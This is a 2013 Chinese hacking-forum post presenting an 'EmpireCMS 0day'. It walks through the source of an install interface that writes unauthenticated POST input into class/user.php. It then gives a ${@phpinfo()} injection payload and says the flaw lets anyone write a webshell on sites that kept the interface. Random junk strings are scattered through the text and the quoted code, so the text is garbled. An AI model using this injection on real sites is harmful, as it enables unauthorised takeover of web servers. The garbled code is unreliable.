找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2403|回复: 0
打印 上一主题 下一主题

帝国万能接口漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
& D$ B7 O  M, @' d6 r% P% B" O& W% d

% l$ D) `6 x5 [. f" x: u  p9 c
这是帝国的一套下载系统 如图
* r1 a+ q+ Y5 xps(不需要任何账户和密码,直接写shell)


. I' x  ~$ _" j% e

由于很多站是由于下载要整合discuz 等等一些论坛....
- @( ~* D$ a; y6 `( O8 }


. t- |5 ]: j/ y5 L" F

而帝国他又有一个万能接口,如图


* C5 m" K. S- N6 `% [0 r0 @4 O; V+ L0 R' T: h! f: G
) X0 Q' O) d* ]# _: e3 ^

而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码9 ~* S1 r. ~. F2 X- e3 U! H3 j
& M  R, n$ D5 S4 k$ u! E$ K
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig

1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}

复制代码

他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
2 k' h3 ^) A5 c  a' E% V
9 [, ]+ s  y: Q  H2 m& i8 f1 J在data/fun.php中的15行: g; t+ ~7 x5 [# [  U

3 a0 y5 y7 ^. ^, C: N6 r我们可以看到这个函数

1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {- o: o4 E4 n; ~, J1 E2 u9 G
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);

复制代码

.....//省略若干
# s; H; Q& n! x7 R) J, x5 H" k0 i9 F8 T& K; K
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
6 I# `, n( I* y$ h# Q7 X7 }# V
( H  a0 \* _& w: x9 b( V; o他将传进来的变量进行了切割,然后赋给了$filetext
/ e; a4 s- |% i, M1 e! J9 }9 _; P; Y3 K0 o) |
然后看下面

1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
6. }
7. @fputs($fp,$filetext);

复制代码

打开了一个class/user.php文件,然后将$filetext写入了
, f8 U. `0 k$ T3 Z$ m* l* U* s9 K+ v+ K+ l) H! ~7 m/ \
我们看看写入的结果,随便填一个

; j0 I/ n2 R2 f) D" M

1 H- p7 c+ F. |/ X$ U
- M0 G$ Q. k4 s! T8 @7 V/ I2 u9 r+ a2 G1 S+ h9 D5 c

) q' G- D! _- Y2 X
, c  a1 m. t1 s( B% Q% M" f

; k1 H( E; b) k4 z: f9 {
. s: z0 @# u9 p
# S! S% s# E/ v) D4 J% u
; \/ K/ S9 J  t: D; T- K6 |
. C% _5 _8 f. }7 w8 v

. t2 T6 }0 S* l5 v3 r+ F
. P  b" n, f/ x2 Y6 [
( q( c" K4 T* r" q5 Z

$ R$ b9 t- d" v/ D. }7 k! ]7 j# Z) V) ?9 ~2 t2 a. N. G- w. i2 l
: F+ E# D( k! W/ x6 W
  O8 y4 s0 t. D, ^2 d

  l9 f% J( M, A+ J& L& W. P0 O! g; w, W3 h6 d0 x" m4 B* V
3 w) ]( n4 k  i: Z4 G( z
3 S6 q3 M4 J1 g* m; s* i. Y7 C

所以我们淫荡点,写个${@phpinfo()}试试

' e/ `* n8 A" ]" [( S& m

然后访问以下class/user.php这个文件/ i' {+ B" s* l/ G& B
日了吧


0 d5 G. ^4 f+ d- @

/ Z+ t+ r6 C+ u0 {* n" g
5 N$ G# D: V' ], x: H  _1 j
6 V* l0 I: w; p

5 x. ?# u; G# @
( k' |  p7 g, B( g/ J

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表